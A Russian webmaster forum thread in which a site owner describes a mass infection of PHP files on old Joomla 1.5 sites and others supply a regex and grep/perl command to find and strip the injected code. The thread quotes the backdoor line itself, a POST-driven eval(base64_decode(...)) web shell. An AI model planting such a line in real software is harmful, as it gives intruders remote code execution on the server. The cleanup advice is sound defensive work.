- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Накидали гадости черти и спамят, уязвимость нашел, устранил, но накидали более 500 файлов, как только с этим кодом, так и в начале старых файлов движков. Как убить махом в Notepad+ ?
<?php eval(base64_decode($_POST['Здесь любой произвольный набор симоволов, цифр и букв']));?>
Регулярка -
Знаком с данной гадостью. Советую так ;)
<\?php\s{10,}eval\(base64_decode\(\$_POST\[.[A-Za-z0-9]{6,7}.\]\)\)\;\?><\?phpИз консоли выглядит примерно так:
grep -lsrP '<\?php\s{10,}eval\(base64_decode\(\$_POST\[.[A-Za-z0-9]{6,7}.\]\)\)\;\?>' --include="*.php" ./ | xargs -i perl -pi -e 's|<\?php\s{10,}eval\(base64_decode\(\$_POST\[.[A-Za-z0-9]{6,7}.\]\)\)\;\?><\?php|<\?php|' {}<\?php\s+eval\(base64_decode\(\$_POST\['.+?'\]\)\);\?>
Спасибо друзья, вроде справился.
Но как полезли черти долбят уже четвертый день по всем хостингам у меня, давно такого не было. Старая joomla в основном страдает 1.5. Надо плотно за апгрейд садится.